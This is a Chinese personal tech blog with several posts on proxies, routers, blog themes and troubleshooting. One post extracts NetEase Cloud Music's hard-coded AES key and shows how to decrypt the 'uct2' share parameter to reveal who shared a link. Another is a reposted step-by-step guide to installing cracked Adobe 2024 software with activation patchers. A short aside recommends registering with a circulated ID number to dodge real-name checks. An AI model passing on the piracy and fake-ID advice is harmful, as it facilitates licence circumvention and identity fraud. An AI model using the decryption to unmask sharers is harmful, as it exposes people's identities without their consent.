        "*": {
          Origin: "DELETE",
          Referer: "DELETE",
        },
      };

      const rules = specialCases[url.hostname] || specialCases["*"];
      for (const [key, value] of Object.entries(rules)) {
        if (value === "DELETE") {
          req2.headers.delete(key);
        } else if (value !== "KEEP") {
          req2.headers.set(key, value);
        }
      }

      const response = await proxy.connect(req2, dstUrl);

      // 强制允许跨域
      const modifiedResponse = new Response(response.body, response);
      modifiedResponse.headers.set("Access-Control-Allow-Origin", "*");
      return modifiedResponse;
    } catch (error) {
      console.error("ShadowProxy error:", error);
      return new Response(`Error: ${error.message}`, { status: 500 });
    }
  }
}

:::warn 听说 CF 最近打反代，评论区有人被封了，想账号不被封的话可以先等等 :::

实装

编辑好脚本部署后，接下来就是调用 API 了

调用十分的简单，域名+link（）

// mid是你的用户id
// keywords这东西本来是给你找视频用的你却用来查最新视频x
// ps是获取个数
const URL =
  "https://<你的域名>/your-auth-token/https://api.bilibili.com/x/series/recArchivesByKeywords?mid=0174927495&keywords=&ps=6";
const resp = await fetch(URL);
const data = await resp.json();

:::note 返回 B 站图片http://i***.hdslb.com/也有跨域问题，所以客户端请求图片的时候也要处理链接 :::

:::tip 对于不想看的可以直接抄（）

首页的实现能在BiliVideo.vue找到啦 :::

本人在 API 这边还是作过限制了，限制了其他协议的访问和允许链接，所以过来偷跑主播流量的就别想了（

btw 今天也给自己主页写了自动获取 github readme skillicon 的功能

说实话没用的小玩意又增加了（主页这东西摆在那没人看还做甚

什么？绿联 NAS 调教教程呢？

先别急，在写（）

换新博客框架了

Thu, 14 Aug 2025 00:00:00 GMT

在访问了不少的博客站点后，也是觉得安知鱼主题烂大街了，功能多了也许就背离初心了

现在换了个比较简洁的主题 Fuwari，配色和动画真的特别舒服，虽然有些过于简洁了，像不支持多级分类（<--这东西已经有 PR 了），评论等功能，自己自定义一下还是能玩的很花的。

换了个主题顺便接触了一下 Astro，还算是个不错的模板语言，构建起来比我的首页快多了（因为没有服务器请求方面需求我为什么还要用 nuxt

大概是 Vue 用的顺手了吧，换成 React/Nextjs 我也可能会有这种抗拒的心理（有种说法，这种表现也可能是因为已经老了吧 😭）

绿联NAS调教记

Wed, 13 Aug 2025 00:00:00 GMT

前几天入了一台绿联的 DXP4800（别问我为啥没买 PLUS），顺便整了一块西数的 8T 数据盘当作云盘，又把吃灰机上的 512G 970 EVO PLUS 当作了系统盘

Update 2025-11-22:

本文估计无期限咕咕下去了

某云神秘的追踪参数

Fri, 31 Jan 2025 00:00:00 GMT

逆向复健一下

之前发现网易云的分享参数里有名为userid=xxxxxxx的参数，里面是分享者的用户 ID，但在某一次更新后取而代之的是uct2=xxxxx，像是加密的样子：

PC 端：https://music.163.com/playlist?id=8416733444&uct2=U2FsdGVkX18I0qiX738+CD1FdOh+w/CByAqGXtw/rt8=

手机端： http://163cn.tv/ByX1EOw

虽然网上已经有现成的工具：找到 TA

但因为其并未公布算法，也可能存在数据安全的问题，就想自己动手造一个平替（）

两者都是链接，但其加密算法不同，因此可以通过 uct2 的不同特征来确定对方的分享平台和用户 ID，下面将分别解析一下两端的 uct2 算法：

手机端

手机端有时复制出来的是短链（http://163cn.tv/，会跳转，包含其他跟踪参数），而电脑端访问会跳转后地址栏闪过 uct2 后继续跳到没有 uct2 的网站，这里通过 curl 获取跳转目标：

$ curl -v http://163cn.tv/ByX1EOw
* Host 163cn.tv:80 was resolved.
* IPv6: (none)
* IPv4: 198.18.1.58
* Trying 198.18.1.58:80...
* Connected to 163cn.tv (198.18.1.58) port 80
* using HTTP/1.x
> GET /ByX1EOw HTTP/1.1
> Host: 163cn.tv
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 302
< Server: nginx
< Date: Fri, 31 Jan 2025 07:58:59 GMT
< Content-Length: 0
< Connection: keep-alive
< Cache-Control: no-store
< Pragrma: no-cache
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< Cache-Control: no-cache
< X-Application-Context: application:8888
< Location: https://y.music.163.com/m/song?id=2668595321&uct2=%2BhNMiP%2FRMJxgbE5ka%2FgRkw%3D%3D&fx-wechatnew=t1&fx-wxqd=c&fx-wordtest=t3&fx-listentest=t3&H5_DownloadVIPGift=&playerUIModeId=5623502&PlayerStyles_SynchronousSharing=t3&dlt=0846&app_version=9.2.45&sc=wm&tn=
< X-From-Src: 114.93.71.49
<
* Connection #0 to host 163cn.tv left intact

Location里的 uct2 就是我们要找的东西。

首先通过 Jadx（类似工具有 ReCaf 等）反编译网易云音乐客户端通过搜索 uct2 得到相关代码（部分代码已删除）：

   public static final void o(Context context, Program program, String platform, Function1<? super com.netease.cloudmusic.share.framework.e, Unit> callback) {
        String string;
        com.netease.cloudmusic.share.framework.e eVar = new com.netease.cloudmusic.share.framework.e();
        eVar.f120920a = String.valueOf(program.getId());
        eVar.f120922d = context.getString(ir1.j.f228957m3, program.getName());
        eVar.f120924f = (!program.needShowFeeTag() || TextUtils.isEmpty(program.getReason())) ? program.getBrand() : program.getReason();
        eVar.f120928j = program.getCoverUrl();
        eVar.f120921b = 1;
        eVar.f120937t = 3;
        eVar.f120934q = program;
        long u15 = ap.a.m().u(); // 返回用户ID
        String b15 = com.netease.cloudmusic.utils.d.INSTANCE.b(j() /* 生成加密密钥 */, String.valueOf(u15)); // 生成加密的用户ID b15
        if (b15 == null) {
        // 生成出错的话就 fallback 到原本的 userid ，机制不清
            string = Intrinsics.areEqual(platform, "sina") ? ApplicationWrapper.getInstance().getString(ir1.j.f228886a4, dp.f124165c, 17, Long.valueOf(program.getId()), Long.valueOf(u15), 0) : ((ILinkConfig) ServiceFacade.get(ILinkConfig.class)).urlStringForKey("program_share", "id", String.valueOf(program.getId()), "userid", String.valueOf(u15), "djId", String.valueOf(program.getDj().getUserId()));
        } else {
            string = Intrinsics.areEqual(platform, "sina") ? ApplicationWrapper.getInstance().getString(ir1.j.f228930i0, dp.f124165c, 17, Long.valueOf(program.getId()), URLEncoder.encode(b15, Charsets.UTF_8.name()), 0) : ((ILinkConfig) ServiceFacade.get(ILinkConfig.class)).urlStringForKey("program_share", "id", String.valueOf(program.getId()), "uct2", b15, "djId", String.valueOf(program.getDj().getUserId()));
            //将uct2作为分享链接的参数使用 (uct2=xxxxxx)
        }
        if (Intrinsics.areEqual(platform, "sina")) {
            eVar.f120924f = ApplicationWrapper.getInstance().getString(ir1.j.W3) + " " + string + " " + ApplicationWrapper.getInstance().getString(ir1.j.f228917g);
        }
        eVar.f120933p = string;
        eVar.f120929l = string;
        eVar.f120930m = com.netease.cloudmusic.module.spread.e.f(program.getMainSong().getId());
        if (!Intrinsics.areEqual(platform, "sina")) {
            String b16 = kp.b(NeteaseMusicApplication.getInstance());
            eVar.f120933p = eVar.f120933p + "&app_version=" + b16;
            eVar.f120929l = eVar.f120929l + "&app_version=" + b16;
        } else if (!com.netease.cloudmusic.share.framework.j.f120943a.c()) {
            eVar.f120926h = "";
            eVar.f120928j = "";
        }
        eVar.f120926h = "";
        callback.invoke(eVar);
    }

占掉我 30 多 G 内存，加上原本就已经红了的 D 盘里还要塞个分页文件

看到是 b15 赋值给了 uct2 ，u15 是咱的用户 id，所以就应该有办法从 uct2 转成原本的 id，先看加密部分，反编译得到 b 函数内部（代码经过处理）：

private final String encode(byte[] data) {
    return Base64.encodeToString(data, 2);
}

// 加密函数，AES/ECB算法
public final String b(String secretKey, String data) {
    try {
        byte[] bytes = secretKey.getBytes(Charsets.UTF_8);
        SecretKeySpec secretKeySpec = new SecretKeySpec(bytes, "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(1, secretKeySpec);
        byte[] bytes2 = data.getBytes(Charsets.UTF_8);
        byte[] doFinal = cipher.doFinal(bytes2);
        return encode(doFinal);
    } catch (Exception e) {
        e.printStackTrace();
        return null;
    }
}

关于加密密钥的是 j 函数，其被调用时返回一个静态单例 Lazy 对象，内部存储的是加密的字符串：

private static final Lazy f298165f = LazyKt__LazyJVMKt.lazy(a.f298166a);

// KT生成的嵌套类
static final class a extends Lambda implements Function0<String> {
    public static final a f298166a = new a();
    a() {
        super(0);
    }

    @Override
    public final String invoke() {
        return (String) ((ICustomConfig) ServiceFacade.get(ICustomConfig.class)).getAppCustomConfig("IuRPVVmc3WWul9fT", "JwDUI7QfKebyIhZwcWAJu1172eV2CgCD", "share#id_encrypt_key"); // 返回加密的字符串，默认值为JwDUI7QfKebyIhZwcWAJu1172eV2CgCD
    }
}

一开始以为又是什么逆天加密算法，最后发现他们的配置名就是一串 base64 了的随机数

通过/assets/default_custom_config_IuRPVVmc3WWul9fT.json可以找到这个配置文件里的加密密钥也是JwDUI7QfKebyIhZwcWAJu1172eV2CgCD

那么理论存在，实验开始——

这里看到原本的 uct2 已经被成功解出来了~

电脑端

通过观察电脑端的 uct2，b64 解出来均以Salted__开头，难不成手机电脑算法不一样？？

PS：Salted__ 是 crypto-js AES 加密加盐的特征本来想着还要碰反汇编，现在一点也不用（本人反汇编水平不咋）

下面通过 BetterNCM 打开控制台并搜索share#id_encrypt_key、uct2等字段，发现他们工程师直接把代码放在orpheus://orpheus/pub/hybrid/app~subApp.chunk.601020.js里边了，这边放上核心加密代码：

function share(e, t) {
  let { payload: n } = e,
    { select: i, call: o } = t;
  return (function* () {
    const {
        platform: e,
        type: t,
        title: a = "分享",
        id: s = 0,
        data: u,
        threadId: p,
      } = n,
      f = yield i((e) => e.host),
      v = y.a.configFromRequest$.getValue(),
      m =
        (null === v || void 0 === v ? void 0 : v["share#id_encrypt_key"]) || "", // 也是从配置文件里获取加密密钥，获取到的也是JwDUI7QfKebyIhZwcWAJu1172eV2CgCD
      b = f.uid || "", // 用户ID
      g = m && b ? d.a.encrypt(b, m, { mode: h.a }).toString() : b, // 加密用户ID，否则fallback
      Q = {
        [k.b.playlist]: "playlist",
        [k.b.audio]: "djradio",
        [k.b.album]: "album",
        [k.b.mv]: "mv",
        [k.b.user]: "user",
        [k.b.artist]: "artist",
        [k.b.article]: "topic",
        [k.b.video]: "video",
        [k.b.voice]: "dj",
        [k.b.track]: "song",
        [k.b.topic]: "activity",
      }; // 分享类型 // 生成分享链接
    let O = "";
    (O =
      g !== b
        ? "https://music.163.com/"
            .concat(Q[t], "?id=")
            .concat(s, "&uct2=")
            .concat(g)
        : "https://music.163.com/"
            .concat(Q[t], "?id=")
            .concat(s, "&userid=")
            .concat(g)), //fallback
      e;
    return !0;
  })();
}

可以看到流程与安卓端差不多，but 加密算法有点不一样！

通过动态分析在 encrypt 处下断点发现加密函数这里的 d 和 h 就是 CryptoJS 的实例，整理后加密算法是这样：

CryptoJS.AES.encrypt(userID, key, { mode: CryptoJS.mode.ECB }).toString();

相应的就能推出解密算法：

其实正常走流程的话要走 webpack 的老路，这边直接拿 CryptoJS 上了

CryptoJS.AES.decrypt(encryptedID, key, { mode: CryptoJS.mode.ECB }).toString(
  CryptoJS.enc.Utf8
);

某云两端加密算法不一样有点想笑，但这可能是检测的某种手段（？）而且发现了有关 config 云控的一些字段，会不会有那种情况的可能？

总结

这种跟踪参数搞对称加密确实比较容易破，双端用的都是解释型语言，对技术的门槛确实比较低，希望大家新的一年天天被视奸手撕加密算法疯狂 deobf 万事如意！！！！

PDM和Pylint补全的一些问题解决

Mon, 09 Dec 2024 00:00:00 GMT

前言

今天玩 PDM 安装 Fluent Widgets 时遇到了一个问题，发现所有装的 import 全部不识别，连自己这个项目里的源文件也不认，但 ctrl+左键却又能看见模块的原文件...

正文

我先是尝试在.vscode/settings.json里改 pylint 的 cwd，结果项目里的源文件认到了，但 import 还是不认...

{
  "pylint.cwd": "${workspaceFolder}/src"
}

其实我还问了群 u 们，发现他们也没能幸免（

自己摸索后继续改 pylint 的设置，发现改解释器的路径后就不再报错了：

{
  "pylint.interpreter": "${workspaceFolder}/.venv/Scripts/python.exe"
}

但这对用别的 IDE 的人很不友好

所以我用万能的搜索引擎发现了通用的解决方案：https://vi.stackexchange.com/questions/45737/pylint-unable-to-find-imports-from-currently-active-virtual-environment

因为没时间去判断这是 bug 还是 intended behavior，所以不敢去官方 repo 那提 issue（

更换了博客主题

Mon, 01 Apr 2024 00:00:00 GMT

感觉还是鱼佬的主题更符合我那看啥都觉得不行的审美（这算选择困难症又犯了吗）

安知鱼主题

Update 2025-08-03: 又换 Fuwari 了，臃肿不是什么好事啊喂

【经验分享】在Clash内直连UDP（玩联机必会）

Mon, 01 Apr 2024 00:00:00 GMT

1. 起因

昨日晚某人在打开 VRC 的时候之前发现无法连上 VRC 的服务器（之前其实没准备做其实因为没被墙），随即打开浏览器一顿操作后学会了写 Clash 的配置（虽然只是接触了一点皮毛

2. 解决

因为之前用 Clash 的时候一直都没注意过 Clash 配置是咋回事，就当加了个全局代理的 V2RayN 用 =w=

首先要会导入订阅，这就不多说了吧（

再确保你用的是全局代理模式（TUN），仅 HTTP 的话 Clash 碰都碰不到 UDP 的流量

好的，简单来说，咱们只需要把 UDP 给禁用掉就行了（我机场 UDP 连不通）先找一个订阅转换工具（这里用的是ACL4SSR，不了解有没有风险啥的）

接着打开进阶模式，在更多选项里把启用 UDP 给他勾去掉，这样 UDP 流量就会走直连啦~

3. 结语

这没什么技术含量，希望这篇文章能帮到大家，不在配置代理上浪费过多时间ヾ(≧▽≦*)o

更新：24/07/12

现在已经用上 Biubiu 加速器了 https://www.biubiu001.com/

纯粹看广告刷时长

用那个 24 亿身份证可以注册

其实大多数游戏的实名都是虚晃一枪，输一个就给过了，根本不查

有人说网易要扫脸，还是我朋友告诉我不用扫脸的，那些人都天天在那乱扯

如果还是觉得有风险的就别用吧

达芬奇Davinci Resolve崩溃

Mon, 01 Apr 2024 00:00:00 GMT

你们装达芬奇的时候是不是把安装界面的勾都打上了，最后启动的时候发现会崩？

阅读日志无果后，继而转向互联网求助（）

官方解答

解决：官方的锅，Control Panel 会导致 Resolve 在启动的某个阶段 crash，然而这 Bug 居然是三年前的了！！现在还没修！

（btw 再吐槽一下达芬奇每次启动都会进行强制扫描 VST 的行为）

Update 2025-08-03: 新版貌似不崩了，应该能不删了（

Adobe2024全家桶(转载) + AE报错打不开解决方案

Mon, 01 Apr 2024 00:00:00 GMT

下载地址

Adobe 软件大全（包含 Win 系统和 Mac 系统各版本各软件，2015-2024 版本）

阿里云盘

百度网盘提取码：2024

选择需要的软件，根据自己的电脑配置选择版本。

避坑

不知道为什么下载下来的一键安装包解压会报错（用 alist 下载的），就装了 CC 版的，装完到了装 AE 的时候，用破解工具破解好，结果打开的时候弹错：

After Effects can't continue: Licensing Error.
Your subscription entitles you to Chinese Simplified product versions.
Please verify the language settings in your OS browser, and software download are set to Chinese Simplified.
If you continue to have installation issues, please contact support.

查一下，发现网上有好多和我一样报错的的，不知道为什么 PS 破解完就没报错，接下来说一下自己的解决方案（暂且没有更好的）

先打开区域与时间，非 Unicode 程序的语言把 UTF8 文打了勾的话会导致你开屏弹错，把勾取消掉，重启就行了

分析下来，你只要你 codepage 不是 936，而且装的还是中文的全家桶，不出意外你就打不开

个人评价： Adobe 你这防盗版防的有点太那啥了吧？

本文转自：https://mp.weixin.qq.com/s/sH_lM3h7teYVYK_pJ9yJRA

金秋十月，Adobe 2024 如约而至！

想必有很多网友都已经安装体验了，在前面已经分享了通过创意云工具在线下载安装方法和离线安装包激活安装方法，而这一期再带来一键安装版。

影视后期系统教学

自@vposy 宣布暂停之后（注：微博才是@vposy 本人，其余平台打着 vposy 名号，均是冒牌货），很多网友还是很怀念@vposy 版本，@vposy 版本区别于其它版就是在于一键安装。

一键安装：即内置了安装激活补丁，安装即激活的，不需要再手动去替换补丁。

此次更新一键安装版是来自俄罗斯老毛子 monkrus 大神，更新包括了：

Adobe After Effects 2024 v24.0.0.55
Adobe Premiere Pr 2024 v24.0.0.58
Adobe Animate 2024 v24.0.0.305
Adobe Audition 2024 v24.0.0.46
Adobe Media Encoder 2024 v24.0.0.54
Adobe Illustrator 2024 v28.0.0.88
Adobe InCopy 2024 v19.0
Adobe InDesign 2024 v19.0
Adobe Photoshop LightroomV Classic 2024 v13.0.0.15
Adobe Bridge 2024 v14.0.0.12
Adobe Photoshop 2024 v25.0.0.37

通用安装方法

Adobe 2024 是大版本更新，故是不能直接覆盖其它 Adobe 2023 、2022 等版本，如果有安装旧版本，是两个版本可共存。

下载好压缩包，解压，直接运行 Set-up.exe 即可安装
如果初次安装，可以自行设置安装路径，安装目录不要有中文

安装完成了，不会自动在桌面创建快捷启动，可以在开始菜单里边看到应用，直接拖拽桌面即可创建快捷启动。

PR 语音转字幕制作工具 Adobe Speech to Text v12.0

此次更新的 PR 是不带语音转字幕的语音包的，这里单独提供工具 Adobe Speech to Text v12.0，可以自定义选择语言类型安装。

语音转文本支持的语言：

简体中文（普通话）Chinese Simplified (Mandarin)
繁体中文（普通话）Traditional Chinese (Mandarin)
英语 English
英语（英国）English (United Kingdom)
西班牙语 Spanish
德语 German
法语 French
日语 Japanese
葡萄牙语 Portuguese
朝鲜语 Korean
意大利语 Italian
俄语 Russian
印度 Indian

一样是直接运行 Set-up.exe 安装，可选择安装语言类似，默认路径安装。

默认语音包路径：

C:\Program Files\Common Files\Adobe\Premiere Pro\24.0\SpeechESL

只安装简体中文

此外如果是通过 Creative Cloud 在线安装更新，也会自动安装语音包。

Adobe 2024 Mac 版本

Adobe 2024 Mac 版本也有两种安装更新方法，一是创意云工具在线下载安装方法，二是使用离线安装包。

Mac 系统安装 2020-2024 全套 adobe 之前，一定要先安装好 Adobe Creative Cloud，因为从 Adobe 2020 版本开始重写了 Creative Cloud 模块，否则软件打开会报错，并且必须联网才能使用。

安装 Adobe Creative Cloud

有安装了，可以跳过，打开 AdobeCreative Cloud 文件，双击 Install 进入安装

点击继续，输入自己点击开机密码，点击好

登录账号，点击继续（没有注册的可以自己注册一个，注册的时候地区选择国外，可以选择美国）

等待安装完成，点击跳过问题！

创意云工具在线下载安装激活方法

在线下载安装方法，即通过创意云工具简称 ACC，通过 ACC 下载最新版本，需要适配激活工具对应的版本，如果 ACC 里边应用更新，就需要等激活工具更新。

此激活程序目前是 1.4 版本，可以一键激活多款 Adobe 软件，但注意需要对应以下版本，目前对应最新版本程序。

After effects v24.0
Premiere Pro v24.0
Media Encoder v24.0
Photoshop v25.0
Illustrator v28.0.0
Lightroom Classic v13.0
Bridge v14.0
InDesign v19.0.0.151
Adobe Distiller v23.006.20320
Adobe Acrobat v23.006.20320

具体使用方法是安装登录 Adobe Creative Cloud，在 Adobe Creative Cloud 下载应用是最新的，下载安装试用，建议都打开都试用一遍，然后再去运行一键激活补丁 Patcher。

此外，在线安装试用是比较慢，建议还是使用离线安装包安装激活。

离线安装包

离线安装包即固定的安装包版本，激活补丁也是固定的，没有特殊情况，安装包是可以一直使用。

安装方法都是通用的，注：ARM 版本即 M1 和 M2 系列芯片电脑使用，Intel 版本是 Intel 芯片电脑使用，U2B 就是芯片都通用。

安装 2023 Adobe 软件之前，一定要先安装好 Adobe Creative Cloud 创意应用软件（安装包在提供链接里边可单独下载），如果有安装好了，可以跳过此步。
安装 AntiCC，有安装过可跳过此步（不安装这个可能出现-2700 报错）

点击 Install 即可默认安装，安装过程需要输入密码，输入自己电脑开机密码。（如果安装有遇到问题，可以看对应问题大全进行解决）

运行激活工具，点击自定义勾选安装对应的激活补丁工具

在启动台打开即可使用

此外，PR 自带语音转文本功能，语音包体积很多占用不少空间，安装好软件之后，可以去对应路径删除。

Mac 系统语音包文件目录， /Library/Application Support/Adobe/Premiere Pro/24.0/SpeechESL

建议只保留 CMN 简体中文和繁体中文，对应所在文件夹 12.1.0.5，其余均可删除。

Adobe 2023 Mac 版本

此外针对 2023 最终版本下载可能出现损坏问题，对安装包进行了优化，重新打包上传，如果工作所需建议安装 2022 或者 2023 版本。

总结

以上，就是 Adobe 2024 Mac 版本安装详细介绍，希望大家都能够免费安装上，后续软件也会继续更新，做到免费没有套路分享，可以转发给更多有需要的小伙伴！

Cloudflare DNS 托管+Github Pages HTTPS加密避坑

Mon, 01 Apr 2024 00:00:00 GMT

起因

最近在 NameSilo 上买了个自己的域名给托管到了 Cloudflare 上，准备当博客，开个自己的个人网站

博客部署完后，准备给自己的简介网站弄个域名，pages 弄上去

就在 Cloudflare 上添加 CNAME 记录指向到我的Github Pages 域名了

特别注意：我这时把 CF 的代理勾选了

事发过程

网站啥的都设置好了，发现没有 https 协议（）

奇怪了，gh pages 上的 dns check 也过了，那个 https 勾选框灰了（恼）

Unavailable for your site because your domain is not properly configured to support HTTPS.

同时 Cloudflare 访问 HTTPS 的加密页面也会因为重定向次数过多而寄掉

解决方案：把 SSL 证书 灵活换成 完全

之后，我尝试将 CNAME 记录改成 A 记录指向 Github 的 IP，也一样报错

@    A    185.199.108.153
@    A    185.199.109.153
@    A    185.199.110.153
@    A    185.199.111.153

后来查到 cloudflare 会自己把根域名下的 cname 转成 a 记录，就这样折腾了大半个小时就结果一无所获

解决方案

这时我想起来之前配置博客弄 https 证书的时候成功在关闭代理的时候把 gh 的证书加上去了，我就开始怀疑是不是 cloudflare 代理的证书影响了 gh 证书检查的功能

我关闭我个人简介站点的加速之后发现 gh pages 已经开始获取证书了：

Unavailable for your site because a certificate has not yet been issued for your domain.

等了大概半分钟之后，原本变灰的按钮已经可以被选中了

开启之后简介网站已经可以强制 https 访问了

总结一下，Github 和 Cloudflare 的加速就过不去，cf 加速开了 gh https 的证书就死活套不上去，要把那个域名的 cf 加速给关闭才加得上去

7.30 更新

为了证书可以顺利续期，需要在 cf 面板里加一些规则：

缓存规则：URI 路径等于/.well-known/*，选择绕过缓存
页面规则：同上，把能关的都关了

配置好以来都未出现过掉证书的现象，有相同问题的小伙伴都可以参考一下

小米AX3000T刷OpenWRT中遇到的问题和解决方案

Mon, 01 Apr 2024 00:00:00 GMT

去年入的路由器，上周试着折腾一下，搞好了公网 ipv6，但现在一到五根本没空写博文 💦

1. 刷入 OpenWRT

简介（转）

CPU：联发科 FiLogic 820 系列的 MT7981，12nm 双核 A53 架构，12nm 工艺制程，1.3GHz 主频

内存：256mb+128MB 的存储组合

网络：4 个自适应千兆口（好评），天线数量 4 根（5G 频段 2+1 配置）支持 160MHz 超大频宽，支持近磁场 NFC 连接 wifi（一次也没有用过。。。）

优点：活动价格保持 15X 性价比很高，轻松跑满千兆，mesh 组网很方便，白色外观设计小巧精致，很简洁缺点：部分人反应断流严重，我不玩游戏没有感触，断流

刷入

网上关于小米刷 OpenWRT 的教程多的去了，自己去百度一下就行。

这里也提供两篇自己参考的文章：

小米 AX3000T 保姆级免拆刷 openWrt 教程以及排坑指南

OpenWrt：刷机小米 WR30U（AX3000T）

用到的计算 SSH 密码的工具：https://miwifi.dev/ssh

固件地址

PS:

第二篇文章里的解锁 SSH 方法我没实测过，我的机子是用上面那篇文章的方法解的

到时候刷 uboot 时一定要用网线连+手动配置 IP！

刷 uboot 的时候可能不止五分钟，千万不要断电！刷完灯会灭，然后重启！

管理后台的默认用户名是root，密码是password！

2. 配置 OpenWRT

刷完 OpenWRT 并不代表配置完了，要想用上公网 IPv6 和无线还有几个步骤！

配置无线

在网络->无线下面把两个网络设置为开启，配置个密码就可以正常使用了。（支持双频合一）

杂七杂八的设置

设置网络前我是先更新了下软件包（系统->软件包），服务里的DDNS-GO、UPNP，

配置 WAN 口和 LAN 口

我家里是电信的光猫做主路由，小米做旁路由的方案，所以和直接 PPPOE 拨号的方案有些许不同！

由于 OpenWRT 默认不支持自动识别 Wan 口，所以我们得手动将网线插入离 Reset 口最进的默认 Wan 口！！！插错口会像我一样无法上网！！！！

（听网上说如果之前改过默认 Wan 口了的话需要插在改过的网口上，没刷机前就是智能识别的可以不管）

接下来需要更改的设置只会在网络->接口里面！！

LAN 口

OK，为了不让局域网使用内部使用自己的 IPv6 地址，首先我们需要清除全局网络选项里的 ULA 前缀，不分配私网 ipv6 地址。

接下来因为我电信路由的网关地址已经是192.168.1.1了，为了不产生冲突，这里需要在LAN里设置一个新的 IP 地址。（只需要设置静态地址就行了，网关和广播正常会自动识别）

DCHP 这里在高级模式里打开强制（不记得原来是开着的还关着的了就提一下），在 IPv6 设置里全部选择中继模式，如图。

高级设置里打开使用内置的 IPv6 管理，为什么写上去，原因同上。

WAN 口

配置 IPv4 的 WAN 就不用我多说了吧，咱们今天稍微讲一下 WAN6 的配置。

因为我这个版本的固件缺了点设置，那些别的教程里的的设置在我的 GUI 上没有（）所以我们就要用到配置文件来改 DHCPv6 的设置！

先确保一下 WAN6 的配置是和图里的一样的：

现在也是最后一步！最后找到/etc/config/dhcp，连上 SSH 用 vi 编辑文件，找到 DHCP 关于 wan 和 wan6 的两项，把原来的删掉，用下面两个替换：

config dhcp 'wan'
        option interface 'wan'
        option ignore '1'
        option dhcpv6 'disabled'
        option ndp 'relay'
        option ra 'relay'
        option master '1'

config dhcp 'wan6'
        option dhcpv6 'relay'
        option ra 'relay'
        option ndp 'relay'
        option master '1'

修改后，重启 network 服务，保险点可以重启一下系统，但有时候我们要手动刷新一下 IPv6，有些时候系统不会马上获取到。（教程）

想要测试 ipv6 连通性话可以用www.test-ipv6.com（梯子需要关！！有些机场自带 IPv6 的线路！）图里应该是 V4 的测试地址被墙了，然后我成了大半个互联网都上不了的人（

参考：

OPENWRT 里面设置 IPV6 方法，OpenWRT 配置 ipv6，旁路由 IPV6 设置（校园网 NAT6），openwrt 配置 ipv6

3. 结语

现在这样就算配置完了一个能获取到公网 IPv6 的 OpenWRT 了，但因为这个版本的固件自带的插件并不多，而且我这里也装不上任何软件包，所以最后如果要加软件包的话是不是得自己编译了（？

体验算好，DDNS 还在研究，离家里云又近一步！

不干净的IP注册Ins遇到的问题

Mon, 01 Apr 2024 00:00:00 GMT

鉴于我的 Ins 号已经被封了两个的情况下，为了去 Ins 上看巨神们的动态，打算再试着注册一次。写这篇文章是因为网上都没有一篇文章详细写如何去解封 Ins 账号的，都是些营销号发出来的文（恼）

我前面两个号应该都是因为不干净的 IP（多个节点不断切换或者 IP 被列入风险名单里）被制裁了，要让我上传自拍（还要拿着白纸在上面写数字和自己的姓名）直接放弃 😭

虽然不知道 Ins 那里的审核自拍机制是怎么样的，又有人说正脸照传了审核还不给通过，就整的我提心吊胆的，到时候又废一个账号。

这里我注册的时候邮箱用的是 Gmail，手机用的是英国号 giffgaff（理论上接码平台也行）（貌似手机号是 IP 进黑名单强制的），用的日本节点，把账号密码什么的输好，会有邮箱验证码和手机验证码，输好就到认证界面了。这次认证的时候不要拿着白纸了，只要自拍就行（好！）

这样就给自拍加了点背景模糊，删了 EXIF（怕泄露隐私），传照片的时候再会要一次验证码，验证完算就上传完成了！

页面说等一个工作日，我等到第二天放学后看邮箱也没什么邮件，上 Ins 看了一下直接进首页，估计后边也不会有什么认证了。

...

玩一玩Obsidian

Mon, 01 Apr 2024 00:00:00 GMT

玩一下

参考

到时候研究一下 qexo 或者 obsidian 的图床或者短链

记一下黑叉改名失败解决方案

Mon, 01 Apr 2024 00:00:00 GMT

一、万恶之源

自蓝鸟黑化之后，整个推都被上了些逆天的东西，我~~大概是因为选择困难犯了~~想重新改下平台上的 ID（这次！应该！不会！再改了！）（确信）

改着改着改到推了，

换梯子？换了几个没用

换用 app？还是没用

账号风控？没被限制

马斯克我测你 🐎

二、原因

大部分原因给排除了，用 Ctrl+Shift+I（别问我为什么不用 F12，问就是用惯了）打开控制台

网络那块发现每次点击保存的时候会发送一个update_profile.json的请求（没有截图）

又在外网上随便找了篇教程，在(清了 Cookie 后重新登陆)[https://twittercommunity.com/t/display-name-change-limit/202585/5]后，发现毫无卵用

又注意到请求旁边还带了个 Service Worker 来搞什么勾八？

三、问题解决

于是我就把 Service Worker 从控制台狠狠地删除了

· · ·

我又试了一次改名，发现可以改名而且成功！（虽然不知道是什么原理但是大佬们可以来研究一下）

这下终于找到原因了，才知道不用 Service Worker 都能成功改名，你推搞个 Worker 来监控请求什么意思都懂（目前只知道是用来推送的）

然而触发了验证，重定向弹出来一个 captcha，在经过了一题的折磨（bushi，雀食简单）后，重定向会主页了，同时发现我的用户名已经改好了，没有跳回去

*顺便再宣传一下我的推~~其实也没啥好看~~ 澪-LLKawi

【水】Neovim装不上竟然是......

Mon, 01 Apr 2024 00:00:00 GMT

哈喽又是我，最近看到 Neovim 的一个视频男人减速带：Neovim 代码编辑器

是的，我装完 neovide 之后开心地打开，然后开心地寄了 wwwwww

...

具体表现就是打开 Neovim 瞬间卡死（关 checker 更新检查器的了想打命令也卡住），CPU 占满一个核

我一开始以为是 Neovim 的问题，升了 Nightly，后来又想是 GCC 的问题，升级了 GCC（我这时候就该把 GCC 给卸了的）尝试无果后又在 Github 上开了 Issue，开发者也一头雾水，我 tm 就？？？？了

整着整着想打开 x64Dbg 出来看看有没有报错，结果里边弹出来 Cygwin...

跳过了不支持的调试类型 IMAGE_DEBUG_TYPE_CODEVIEW （在模块vim.so中）……
在模块 vim.so 中没有找到任何支持的调试类型！
DLL已载入： 00000004D15D0000 C:\Users\User\AppData\Local\nvim-data\lazy\nvim-treesitter\parser\vim.so
跳过了不支持的调试类型 IMAGE_DEBUG_TYPE_CODEVIEW （在模块cygwin1.dll中）……
在模块 cygwin1.dll 中没有找到任何支持的调试类型！
DLL已载入： 00007FFFDD8D0000 D:\cygwin64\bin\cygwin1.dll
调试字符串： "cYgFFFFFFFF 7FFFDDAFB0C0 0"
EXCEPTION_DEBUG_INFO:
           dwFirstChance: 1
           ExceptionCode: E24C4A02
          ExceptionFlags: 00000081
        ExceptionAddress: kernelbase.00007FF8C33DEE5A
        NumberParameters: 0
第一次异常于 00007FF8C33DEE5A (E24C4A02)！
EXCEPTION_DEBUG_INFO:
           dwFirstChance: 1
           ExceptionCode: C0000005 (EXCEPTION_ACCESS_VIOLATION)
          ExceptionFlags: 00000000
